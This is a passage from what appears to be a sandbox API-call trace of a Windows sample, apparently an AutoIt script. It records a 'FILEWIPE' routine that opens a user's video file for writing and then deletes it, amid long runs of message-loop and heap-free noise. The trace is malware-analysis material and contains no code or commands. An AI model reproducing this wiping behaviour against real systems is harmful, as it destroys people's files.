wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.781] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.781] FreeLibrary (hLibModule=0x74f20000) returned 1 [0194.782] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.782] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.791] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.792] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.792] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0194.792] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.792] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x9c8857a0, ftLastWriteTime.dwHighDateTime=0x1d5dfea, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 0x90af58 [0194.792] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0194.792] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.792] CharLowerBuffW (in: lpsz="byte[8922]", cchLength=0xa | out: lpsz="byte[8922]") returned 0xa [0194.793] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.793] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0194.793] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.793] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0194.793] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0194.793] FreeLibrary (hLibModule=0x75c90000) returned 1 [0194.793] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.793] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.794] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0194.794] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\6rbgdlsa.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0194.795] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0194.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0194.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.796] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.796] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.796] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.796] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.796] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.797] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.797] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.797] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.797] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.797] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.797] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.798] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.798] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.798] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.798] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.798] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi", lpFilePart=0x0) returned 0x53 [0194.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0194.798] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x194e6180, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 0x90af58 [0194.799] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\6rbgdlsa.avi")) returned 1 [0194.802] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x194e6180, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 0 [0194.802] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0194.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, 